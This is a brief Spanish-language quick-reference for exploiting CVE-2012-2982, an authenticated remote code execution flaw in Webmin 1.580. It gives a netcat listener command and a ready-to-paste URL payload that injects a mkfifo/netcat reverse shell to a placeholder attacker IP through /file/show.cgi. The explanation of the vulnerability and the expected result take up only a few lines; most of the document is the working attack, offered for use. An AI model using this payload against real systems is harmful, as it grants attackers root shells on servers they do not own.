
Exploit manual de ejecución remota de código (RCE) autenticado, no Metasploit, a través de la barra de URL del navegador para Webmin 1.580 (CVE-2012-2982)
Referencia rápida para ejecutar Ejecución Remota de Código (RCE) autenticada en Webmin 1.580 a través del componente /file/show.cgi.
Ejecuta este comando en tu máquina local para capturar la conexión entrante antes de ejecutar el payload:
rlwrap nc -lnvp 4444
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Nota: Recuerda reemplazar <YOUR_ATTACK_IP> con tu dirección IP local o de túnel real, TAMBIÉN la IP y PUERTO del objetivo.

Contexto y Detalles Vulnerabilidad: Saneamiento insuficiente de la información de ruta en línea pasada a la función open() interna de Perl en /file/show.cgi. Agregar el carácter de tubería (|) permite la ejecución arbitraria de comandos con privilegios de root.
Autenticación: Esto requiere una sesión activa. El navegador maneja automáticamente la autenticación enviando las cookies de tu sesión activa cuando envías el payload de la URL.
Comportamiento esperado: Después de presionar Enter, la pestaña del navegador se pondrá a cargar y parecerá colgarse indefinidamente. Esto confirma que el hilo del servidor ha sido secuestrado exitosamente para mantener la sesión interactiva de shell.